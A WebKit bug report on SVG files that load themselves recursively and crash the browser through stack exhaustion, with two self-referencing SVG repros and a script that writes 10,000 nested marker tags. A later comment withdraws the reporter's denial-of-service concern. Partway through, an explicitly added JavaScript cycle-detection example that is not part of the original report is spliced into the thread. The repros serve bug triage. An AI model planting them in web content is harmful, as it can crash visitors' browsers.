Bug 39675 - SVG recursion stack exhaustion crashes.
Summary: SVG recursion stack exhaustion crashes.
Status: RESOLVED INVALID
Alias: None
Product: WebKit
Classification: Unclassified
Component: SVG
Version: 528+ (Nightly build)
Hardware: PC Windows Vista
Importance: P1 Normal
Assignee: Nobody
Reported: 2010-05-25 08:22 PDT by Berend-Jan Wever
Modified: 2016-10-12 05:58 PDT
CC: 3 users

Attachments
Recursion test (768 bytes, application/zip)
2016-10-12 05:57 PDT, Dirk Schulze
Description Berend-Jan Wever 2010-05-25 08:22:36 PDT
Having an SVG image load itself through an svg "image" tag or an html "img" tag using foreignObject causes infinite recursion, which crashes the browser. I'm creating one bug for both because they are essentially caused by the same problem. Feel free to split them if you think that works better.

-- html "img" tag --
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" width="1063" height="638">
  <foreignObject>
    <body xmlns="http://www.w3.org/1999/xhtml">
      <img src="[url to this .svg file]" />
    </body>
  </foreignObject>
</svg>

Chromium bug: http://code.google.com/p/chromium/issues/detail?id=44995
Repro: http://skypher.com/SkyLined/Repro/Chrome/44995%20-%20WebCore..FrameView..paintContents%20RecursionSOV%20(1b0fa0eb19ffe8d1d29dd7a361a99ee0)/repro.svg

-- svg "image" tag --
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" width="1063" height="638">
  <image x="0" y="0" width="1063" height="638" xlink:href="[url to this .svg file]" />
</svg>

Chromium bug: http://code.google.com/p/chromium/issues/detail?id=44998
Repro: http://skypher.com/SkyLined/Repro/Chrome/44998%20-%20WebCore..CachedImage..changedInRect%20RecursionSOV%20(512de755335cb1ab73932c04c63216ba)/repro.svg

Marking as security: Because many chat/forum websites allow users to insert images with arbitrary URLs, these crashes can be used as a DoS against these websites.
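Both repros above form a reference cycle: the document's own URL appears as an image source inside the document, so each paint of the outer image loads and paints the inner one, and so on until the stack is exhausted. The usual engineering guard is to track the chain of resources currently being loaded or painted and refuse a reference that is already on that chain (or that exceeds a fixed depth). The following is an added example, not WebKit code and not part of this bug report: a small reference walker that finds such cycles in SVG text. It uses a constructed in-memory map in place of a real fetch, the file names (self.svg, a.svg, b.svg, leaf.svg, ok.svg) are made up, and the regex-based extraction of image references is a deliberate simplification of a real parser.

```javascript
// Added example (not WebKit code): detect self-referencing / cyclic image
// references across SVG documents before rendering them.
//
// Constructed sample documents. "self.svg" references itself through an SVG
// <image>, like the second repro; "a.svg" -> "b.svg" -> "a.svg" is a two-step
// cycle built from a foreignObject <img> and an SVG <image>; "ok.svg" ->
// "leaf.svg" is an acyclic chain.
const documents = {
  "self.svg": `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image x="0" y="0" width="1063" height="638" xlink:href="self.svg" />
</svg>`,
  "a.svg": `<svg xmlns="http://www.w3.org/2000/svg">
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><img src="b.svg" /></body></foreignObject>
</svg>`,
  "b.svg": `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="a.svg" />
</svg>`,
  "leaf.svg": `<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1" /></svg>`,
  "ok.svg": `<svg xmlns="http://www.w3.org/2000/svg"><image href="leaf.svg" /></svg>`,
};

// Stand-in for a network fetch: returns the document text or undefined.
function fetchDoc(url) {
  return documents[url];
}

// Collect the image references a document would load when painted:
// <image xlink:href=".."> / <image href=".."> and <img src=".."> inside
// foreignObject. A regex is enough for this demo; a real engine walks the DOM.
function imageReferences(svgText) {
  const refs = [];
  const re = /<(?:image|img)\b[^>]*?\b(?:xlink:href|href|src)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = re.exec(svgText)) !== null) refs.push(m[1]);
  return refs;
}

// Depth-first walk of the reference graph. `path` is the chain of documents
// currently being painted, which is exactly the information the renderer's
// call stack holds; a URL already on that chain is a cycle. A chain longer
// than maxDepth is rejected as well, since a long acyclic chain of nested
// images still grows the paint recursion without bound.
function checkRecursion(url, fetch, maxDepth = 16, path = []) {
  const chain = [...path, url];
  if (path.includes(url)) return { cycle: true, tooDeep: false, chain };
  if (path.length >= maxDepth) return { cycle: false, tooDeep: true, chain };
  const text = fetch(url);
  if (text === undefined) return { cycle: false, tooDeep: false, chain };
  for (const ref of imageReferences(text)) {
    const r = checkRecursion(ref, fetch, maxDepth, chain);
    if (r.cycle || r.tooDeep) return r;
  }
  return { cycle: false, tooDeep: false, chain };
}

// Usage: safeToRender("self.svg") -> false, safeToRender("ok.svg") -> true
function safeToRender(url) {
  const r = checkRecursion(url, fetchDoc);
  return !(r.cycle || r.tooDeep);
}
```

The guard belongs at the point where a nested resource is about to be loaded or painted, not after a crash: once the chain already contains the URL, the load is skipped (or the image drawn as broken), which is what browsers do today and why comment 5 below can close this as not a problem.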
Comment 1 Berend-Jan Wever 2010-11-22 04:44:30 PST
Another way to trigger stack exhaustion through recursion:

<script>
s = new Array(10000).join('<marker>');
document.writeln('<svg>' + s);
</script>
Comment 2 Berend-Jan Wever 2010-12-01 07:38:00 PST
This is not a security issue
Comment 3 Alexey Proskuryakov 2011-01-11 09:44:41 PST
> Another way to trigger stack exhaustion through recursion:

That sounds like bug 15123.
Comment 4 Dirk Schulze 2016-10-12 05:57:35 PDT
Created attachment 291351
Recursion test

Test for recursion
Comment 5 Dirk Schulze 2016-10-12 05:58:19 PDT
The recursion is not a problem.